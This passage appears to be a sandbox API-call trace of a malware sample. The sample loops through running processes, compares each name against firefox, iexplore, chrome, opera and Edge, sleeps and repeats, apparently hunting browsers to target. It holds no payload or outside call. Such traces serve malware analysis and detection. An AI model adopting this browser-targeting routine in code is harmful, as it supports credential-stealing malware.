lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0241.276] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0241.276] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0241.276] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.276] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0241.276] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0241.276] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0241.276] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0241.276] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0241.276] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.276] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0241.277] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0241.277] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0241.277] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0241.277] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0241.277] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.277] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0241.277] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0241.277] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0241.277] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0241.277] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0241.278] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0241.278] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0241.278] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0241.278] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0241.278] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0241.278] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0241.278] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.278] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0241.279] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0241.279] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0241.279] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0241.279] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0241.279] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.279] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0241.279] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0241.279] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0241.279] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0241.279] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0241.279] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.279] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0241.280] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0241.280] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0241.280] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0241.280] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0241.280] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.280] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0241.280] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0241.280] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0241.281] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0241.281] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0241.281] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.281] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0241.281] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0241.281] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0241.281] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0241.281] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0241.281] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0241.281] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0241.282] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0241.282] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0241.282] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0241.282] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0241.282] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0241.282] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0241.282] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0241.282] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0241.282] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0241.282] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0241.282] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0241.282] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0241.283] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0241.283] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0241.283] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0241.283] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0241.283] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.283] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0241.283] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0241.283] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0241.283] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0241.283] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0241.284] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0241.284] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0241.284] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0241.284] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0241.284] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0241.284] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0241.284] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.284] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0241.285] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0241.285] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0241.285] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0241.285] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0241.285] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.285] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.285] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0241.285] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0241.285] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0241.285] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0241.285] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.285] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0241.286] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0241.286] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0241.286] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0241.286] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0241.286] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.286] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.286] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0241.286] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0241.287] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0241.287] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0241.287] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.287] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0241.287] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0241.287] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0241.287] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0241.287] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0241.287] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.287] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0241.288] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0241.288] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0241.288] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0241.288] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0241.288] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0241.288] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0241.288] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0241.288] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0241.288] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0241.288] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0241.288] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.288] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0241.289] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0241.289] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0241.289] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0241.289] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0241.289] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.289] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0241.289] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0241.289] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0241.290] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0241.290] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0241.290] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0241.290] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0241.290] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0241.290] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0241.290] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0241.290] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0241.290] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0241.290] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0241.291] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0241.291] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0241.291] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0241.291] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0241.291] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0241.291] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0241.291] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0241.291] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0241.291] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0241.291] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0241.291] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0241.291] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0241.292] CloseHandle (hObject=0xe8) returned 1 [0241.292] Sleep (dwMilliseconds=0x3e8) [0242.301] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0242.302] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0242.303] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0242.303] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0242.303] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0242.303] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0242.303] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0242.303] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0242.303] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0242.303] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0242.303] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0242.304] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0242.304] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0242.304] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0242.304] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0242.304] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0242.304] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0242.304] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0242.304] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.304] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0242.305] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0242.305] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0242.305] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0242.305] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0242.305] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0242.305] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0242.305] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0242.305] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0242.305] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0242.305] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0242.305] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.305] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0242.306] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0242.306] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0242.306] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0242.306] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0242.306] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0242.306] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0242.306] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0242.306] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0242.306] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0242.306] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0242.307] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.307] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0242.307] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0242.307] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0242.307] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0242.307] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0242.307] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.307] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0242.308] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0242.318] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0242.319] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0242.319] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0242.319] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0242.319] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0242.319] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0242.319] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0242.319] lstrcmpiA 